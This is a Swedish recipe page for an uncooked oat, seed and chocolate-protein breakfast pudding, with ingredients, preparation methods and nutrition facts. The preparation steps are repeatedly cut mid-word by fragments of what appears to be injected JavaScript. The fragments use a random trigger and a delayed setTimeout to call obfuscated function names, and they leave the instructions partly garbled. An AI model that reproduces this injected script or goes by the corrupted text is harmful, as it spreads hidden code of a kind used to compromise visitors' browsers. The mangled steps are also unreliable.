Havre, chokladpudding. Frukost kicken.

2013-09-15
_SAM0357_SAM0358
  • Servings : 1-2
  • Prep Time : 0m
  • Cook Time : 0m
  • Ready In : 0m

Det går att göra den på flera olika sätt men huvudsaken är att den är o kokad. Många har höjt ögonbrynen när jag nämnt den men har gett med sig och erkänt att den är verkligen god.

  • 80g 2dl fiber havregryn
  • 10g 1 matsked solrosfrön
  • 5g 1 matsked linfrön
  • 5g 1 matsked chiafrön
  • 40g 1 skopa choklad protein (core eller core protein pro)
  • Nypa salt (jag använder himalaya salt)
  • 1,5 – 2,5 dl vatten.
  • (30g bär)

Det finns lite olika tillväga sätt att förbereda puddingen.

Gör så här:

Har ni bråttom blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ar ni allt i en skål med 1,5dl vatten. Det ska vara svårblandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}at och inte blött. Använd då helst kasein protein som suger åt sig vätskan mer.

Blötlägg havregryn, linfrö och chiafrön med 2,5dl vatten i en timme i kylen. Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i proteinpulver torrt med salt. Här blir det bäst med vassleprotein som inte suger åt sig vätskan lika mycket.

Blötlägg havregrynen med 2dl vatten kvällen innan, ställ in i kylen. På morgonen blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ar ni in resten. . Här blir det bäst med vassleprotein som inte suger åt sig vätskan lika mycket

Ni behöver inte ha bär, det går lika bra med sockerfri sylt. Det går så klart lika bra med vilket protein ni vill och vilken smak som passar er men själv är jag svag för chokladpuddingen på morgonen

Recipe Type: Tags: , , , , ,
Medlemsbetyg

(5 / 5)

5 5 1
Betygsätt recept

1 people rated this recipe

Related Recipes:
  • Avokado & äggmacka

    Avokado & äggmacka

  • Hummus

    Proteinrik hummus

  • image

    Mugcake med smak av banan och choklad

  • image

    Köttbullar med grönsaker och gräddsås

  • image

    Äggpannkaka med smak av kanel

Näringssinnehåll

Informationen gäller per portion

  • kCal

    266,4
  • Protein

    26,4 g
  • Kolhydrater

    21,5 g
  • Fett

    6,9 g

Recipe Comments

Post A Comment

Current ye@r *